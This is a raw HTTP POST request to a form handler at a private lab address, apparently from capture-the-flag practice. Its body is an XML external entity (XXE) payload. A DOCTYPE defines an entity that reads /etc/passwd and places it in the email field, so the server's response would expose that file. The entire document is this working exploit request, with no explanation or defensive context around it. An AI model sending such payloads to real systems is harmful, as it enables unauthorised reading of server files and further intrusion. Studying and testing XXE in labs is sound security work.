POST /process.php HTTP/1.1
Host: 10.10.254.111
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.10.254.111/
Content-Type: text/plain;charset=UTF-8
Content-Length: 222
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [<!ELEMENT data ANY>
<!ENTITY file SYSTEM "file:///etc/passwd">]>
<root>
	<name>aa</name>
	<tel>aa</tel>
	<email>&file;</email>
	<password>aa</password>
</root>